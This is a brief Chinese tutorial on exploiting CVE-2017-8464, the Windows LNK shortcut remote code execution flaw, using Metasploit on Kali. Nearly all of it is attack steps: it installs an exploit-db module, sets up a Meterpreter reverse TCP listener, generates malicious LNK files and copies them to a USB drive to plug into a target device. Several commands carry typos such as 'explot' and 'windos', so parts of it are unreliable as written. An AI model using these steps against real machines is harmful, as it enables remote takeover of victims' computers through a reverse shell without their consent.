kali下CVE-2017-8464利用

参考:https://www.exploit-db.com/exploits/42382
https://www.youtube.com/watch?v=nKZTUnjt2Vs

Microsoft LNK RCE Exploit

下载42382.rb文件
mv 42382.rb CVE_2017_8464_LINK_Rce.rb 
mv CVE_2017_8464_LINK_Rce.rb /usr/shar/metasplot-framework/modules/exploits/windows/fileformat/ 
msfconsole
reload_all
use explot/multi/handler
set payload windos/meterpreter/reverse_tcp
set lhost 监听者IP
端口默认4444
exploit



msfconsole
use exploit/windows/fileformat/CVE_2017_8464_LINK_Rce
set payload windos/meterpreter/reverse_tcp
set lhost 监听者IP
exploit
把/root/.msf4/local下的文件复制到U盘设备


U盘插入目标设备。

你可能感兴趣的:(安全)